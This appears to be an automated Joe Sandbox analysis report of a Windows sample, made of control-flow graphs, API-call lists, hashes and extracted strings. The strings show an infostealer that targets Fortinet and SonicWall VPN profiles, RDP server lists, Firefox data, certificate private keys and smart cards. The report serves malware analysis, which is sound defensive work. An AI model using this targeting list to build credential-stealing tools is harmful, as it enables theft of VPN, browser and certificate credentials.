                                                                                                                                                                • Opcode ID: dde7782f1bc3f6fc15d7fd9262a944f11080e4dfcac6f8c9fc0e3dfe22951d74
                                                                                                                                                                • Instruction ID: 934ab2da12eccaa53f756a2a0b40cbd51b8b926f041f3c759c99b23344df5d36
                                                                                                                                                                • Opcode Fuzzy Hash: dde7782f1bc3f6fc15d7fd9262a944f11080e4dfcac6f8c9fc0e3dfe22951d74
                                                                                                                                                                • Instruction Fuzzy Hash: A2518236B09A018AEB10EFA5D8543EC67A5BB58788F900535DE1E97BD5DF3CE109C360

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 129 7ff780b69224-7ff780b69306 GetSystemTimeAsFileTime call 7ff780b69a20 * 3 call 7ff780b69a98 call 7ff780b62698 call 7ff780b625dc call 7ff780b67b34 * 4 call 7ff780b6971c call 7ff780b625b4 154 7ff780b69309-7ff780b69317 129->154 155 7ff780b69329-7ff780b69330 154->155 156 7ff780b69319-7ff780b6931c call 7ff780b6968c 154->156 158 7ff780b6938c-7ff780b69393 155->158 159 7ff780b69332-7ff780b69335 155->159 162 7ff780b69321-7ff780b69323 156->162 160 7ff780b69395-7ff780b69399 call 7ff780b6968c 158->160 161 7ff780b693a2-7ff780b693b6 WaitForSingleObject 158->161 159->158 163 7ff780b69337-7ff780b69351 159->163 170 7ff780b6939e-7ff780b693a0 160->170 165 7ff780b693b8-7ff780b693ca GetSystemTimeAsFileTime 161->165 166 7ff780b693f5 161->166 162->155 162->166 167 7ff780b69353-7ff780b69365 call 7ff780b67b50 163->167 168 7ff780b69382-7ff780b69386 163->168 165->154 171 7ff780b693d0-7ff780b693e3 call 7ff780b69a98 165->171 172 7ff780b693f7-7ff780b69417 166->172 178 7ff780b69367-7ff780b6936e 167->178 179 7ff780b69374-7ff780b69380 167->179 168->158 169 7ff780b69418-7ff780b6942c WaitForSingleObject 168->169 169->166 176 7ff780b6942e-7ff780b69434 169->176 170->161 170->166 171->154 184 7ff780b693e9-7ff780b693ef TerminateProcess 171->184 180 7ff780b69436-7ff780b69439 call 7ff780b6968c 176->180 181 7ff780b69442-7ff780b69449 176->181 178->169 178->179 179->167 179->168 186 7ff780b6943e-7ff780b69440 180->186 182 7ff780b6944b-7ff780b6944f call 7ff780b6968c 181->182 183 7ff780b69458-7ff780b69468 GetExitCodeProcess 181->183 190 7ff780b69454-7ff780b69456 182->190 188 7ff780b6946a-7ff780b69471 183->188 189 7ff780b69473-7ff780b69475 183->189 184->166 186->166 186->181 188->166 188->189 189->172 190->166 190->183
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B6924D
                                                                                                                                                                  • Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B693AB
                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B693C0
                                                                                                                                                                • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B693EF
                                                                                                                                                                  • Part of subcall function 00007FF780B6968C: PeekNamedPipe.KERNELBASE ref: 00007FF780B696B8
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B69421
                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 00007FF780B69460
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                                                                                                                • String ID: & echo
                                                                                                                                                                • API String ID: 2711250446-3491486023
                                                                                                                                                                • Opcode ID: 0e5a6491b23a52f077622e03fa1d9963b355e200ccccf575446c2c7b3acaf6c1
                                                                                                                                                                • Instruction ID: b4e2143e04c483dee3af429cc20f052373837aab7d23b751e7a157ef4823e29a
                                                                                                                                                                • Opcode Fuzzy Hash: 0e5a6491b23a52f077622e03fa1d9963b355e200ccccf575446c2c7b3acaf6c1
                                                                                                                                                                • Instruction Fuzzy Hash: 86516229B0A64285EE60EB56E9552BAEB95FF84B80FE44031CA5F47BC5DE3CF445C320

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                                                                                                                • String ID: )qnq$dqyq$yqyq
                                                                                                                                                                • API String ID: 3617724111-466822987
                                                                                                                                                                • Opcode ID: 3fbbea3cf0043cfd1396815568612ef09bc48b21a67d779a1035e65ff906c74b
                                                                                                                                                                • Instruction ID: a691de8d8a50a8e5ffc9b85b56ee34dd5e1b27f7f01fa339fce4998fd39c9e6d
                                                                                                                                                                • Opcode Fuzzy Hash: 3fbbea3cf0043cfd1396815568612ef09bc48b21a67d779a1035e65ff906c74b
                                                                                                                                                                • Instruction Fuzzy Hash: 2921C776A1868286EB50EF5AEC152AAE721FBC0780F645431EA9F477C9DF3CE405CB50

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CertEnumStoreSystem
                                                                                                                                                                • String ID: ":{$"_":""
                                                                                                                                                                • API String ID: 4132996702-2026347918
                                                                                                                                                                • Opcode ID: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                                                                                                                • Instruction ID: 4a102a4f468b27ae2801ad7022903a9360b523a87208b0299147e21dd0bd0431
                                                                                                                                                                • Opcode Fuzzy Hash: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                                                                                                                • Instruction Fuzzy Hash: D9012155A0864146FB04AB5AAC510B99B55BF94BC0FAC5831DD6F477DACF2CF142C720

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CertEnumLocationStoreSystem
                                                                                                                                                                • String ID: "_": ""
                                                                                                                                                                • API String ID: 863500693-1453221996
                                                                                                                                                                • Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                                                                                                • Instruction ID: 22a57ce37c0992170f9ea643f8f2eb9bfd92a70cabc093afedac58cdb4071962
                                                                                                                                                                • Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                                                                                                • Instruction Fuzzy Hash: 40E03059A1850245EB44BFA6AC250F49714AF487C0FDC2831D92F463D6DE2CF486C230

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileNamedPeekPipeRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 327342812-0
                                                                                                                                                                • Opcode ID: 096132fb93717013b3e16f88d7bf0609256235cc15a0420f845206ceb18e82a6
                                                                                                                                                                • Instruction ID: 948cabff03476e0cfbfe8988c27984f0e7b76884d5f275f17403c0e25bf775f3
                                                                                                                                                                • Opcode Fuzzy Hash: 096132fb93717013b3e16f88d7bf0609256235cc15a0420f845206ceb18e82a6
                                                                                                                                                                • Instruction Fuzzy Hash: 8B01223672824287FB50AF16E80473AEBA0FB85BD4FA44130DA1A4B794DF7CE840CB10

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2021502500-0
                                                                                                                                                                • Opcode ID: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                                                                                                                • Instruction ID: 168717a5ea3e816e1f3ce2569a383e46872ac67d7206424055a166cf2f57dc92
                                                                                                                                                                • Opcode Fuzzy Hash: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                                                                                                                • Instruction Fuzzy Hash: B4019226A0A74282FF90AF25D8403786769FF40B88FA45531CA1F476C9DF2CEC85C320

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 682 7ff780b61a70-7ff780b61ab8 call 7ff780b61918 wvsprintfW
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wvsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2795597889-0
                                                                                                                                                                • Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                                                                                                • Instruction ID: 985c900ae4de829208414ca01d23ec263fc235d3c79e2a788c4abb0ccd780908
                                                                                                                                                                • Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                                                                                                • Instruction Fuzzy Hash: 1DE06DB2A00B45C7D704DF19E94008CBB75FB99FC4BA48021CB4817365CF38D996C760

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 685 7ff780b679c4-7ff780b679d9 GetNativeSystemInfo 686 7ff780b679db-7ff780b679e1 685->686 687 7ff780b679e7 685->687 686->687 688 7ff780b679e3-7ff780b679e5 686->688 689 7ff780b679e9-7ff780b679ed 687->689 688->689
                                                                                                                                                                APIs
                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF780B674DE), ref: 00007FF780B679CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                                                                • Instruction ID: e95a14f2eeae5433aae0cdb299c80c805a0bfba740db4418c971663996329975
                                                                                                                                                                • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                                                                • Instruction Fuzzy Hash: F4D05E46E08482A2DA317B04980B036A6A1BF50308FE00231C19E026E1EF6CA689DA25
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                                                                                                                • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                                                                                                                • API String ID: 2508640211-1951492331
                                                                                                                                                                • Opcode ID: bb7d15e3086eb18682641ca85572dad04f967e087e63031bb7c042d0c4f9d4dc
                                                                                                                                                                • Instruction ID: 3ab49ecdbfbcbd3529b2317df4c83b15d2c7893a8554f789ff76c0f5824a2a45
                                                                                                                                                                • Opcode Fuzzy Hash: bb7d15e3086eb18682641ca85572dad04f967e087e63031bb7c042d0c4f9d4dc
                                                                                                                                                                • Instruction Fuzzy Hash: 7312A029A1868249EB10FB65DC542F9AB61BF81784FE44431DA2F47BDADF2CF505C720
                                                                                                                                                                APIs
                                                                                                                                                                • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B6325E
                                                                                                                                                                • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF780B6328D
                                                                                                                                                                • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B632BB
                                                                                                                                                                  • Part of subcall function 00007FF780B636F0: CryptExportKey.ADVAPI32 ref: 00007FF780B63744
                                                                                                                                                                  • Part of subcall function 00007FF780B636F0: CryptExportKey.ADVAPI32 ref: 00007FF780B6379E
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63336
                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63380
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B633AC
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B633DC
                                                                                                                                                                • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B63404
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B6341C
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B6343F
                                                                                                                                                                • CryptAcquireContextA.ADVAPI32 ref: 00007FF780B63459
                                                                                                                                                                • CryptImportKey.ADVAPI32 ref: 00007FF780B6347E
                                                                                                                                                                • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B634B5
                                                                                                                                                                • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63505
                                                                                                                                                                • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63523
                                                                                                                                                                • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63532
                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B6355D
                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B6357C
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B6359F
                                                                                                                                                                • NCryptExportKey.NCRYPT ref: 00007FF780B63605
                                                                                                                                                                • CertOpenStore.CRYPT32 ref: 00007FF780B63667
                                                                                                                                                                • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF780B63682
                                                                                                                                                                • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF780B6369E
                                                                                                                                                                • PFXExportCertStoreEx.CRYPT32 ref: 00007FF780B636BD
                                                                                                                                                                • PFXExportCertStoreEx.CRYPT32 ref: 00007FF780B636DF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                                                                                                • String ID: /.2x$7+D$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$ioyn
                                                                                                                                                                • API String ID: 2161712720-1498425709
                                                                                                                                                                • Opcode ID: 204ad4d0df6e6ae5abe84d6b40ec66ba03013ccc2c8b7144010a1f3a186aa803
                                                                                                                                                                • Instruction ID: db7d9ce8969807c2c8ffeac641a6584e38ebc8faea07c58fdf14257472baf8db
                                                                                                                                                                • Opcode Fuzzy Hash: 204ad4d0df6e6ae5abe84d6b40ec66ba03013ccc2c8b7144010a1f3a186aa803
                                                                                                                                                                • Instruction Fuzzy Hash: 4CE15B36B14A818AE710DFA5E8457EDB7A1BB48B88F904136DE4E17B88DF3CE149C750
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                                                                                                                • String ID: =p"p$=p"p$>p9p
                                                                                                                                                                • API String ID: 199669925-890668147
                                                                                                                                                                • Opcode ID: 0fc138027327edf48a57905c87577208240823e72abb7732a7634aa4fde25a18
                                                                                                                                                                • Instruction ID: 5f3a684d65055b36577257c00cc2c89f0510956707b248d7f7dfe4ab1fd243f3
                                                                                                                                                                • Opcode Fuzzy Hash: 0fc138027327edf48a57905c87577208240823e72abb7732a7634aa4fde25a18
                                                                                                                                                                • Instruction Fuzzy Hash: 63A10776B187818AEB10EF6698441ADBBA1FB85B84FA44035DF5E47B85DF3CE405CB20
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                                                                                                                • String ID: *.default-release$APPDATA$\places.sqlite
                                                                                                                                                                • API String ID: 4154822446-3438982840
                                                                                                                                                                • Opcode ID: e65e7b83617ab43540fe00d47d34ac815f55c605aef4560ecc047bbf39011d3b
                                                                                                                                                                • Instruction ID: 64964c95e65dbee63227d326bf2d256695a0a772edbfe19abb22f0aa60eb22e5
                                                                                                                                                                • Opcode Fuzzy Hash: e65e7b83617ab43540fe00d47d34ac815f55c605aef4560ecc047bbf39011d3b
                                                                                                                                                                • Instruction Fuzzy Hash: C231C521A1894795EF10EF18EC441E8A720FB44794FD05031DA5F47BD8EF6CE609C760
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                                                                                                                • String ID: "_": ""$%02X
                                                                                                                                                                • API String ID: 2879528921-1880646522
                                                                                                                                                                • Opcode ID: ed9f32e50c8f5160b7ce924a75e09b74c906d36f2cf7978b60ed95eb74a4cc79
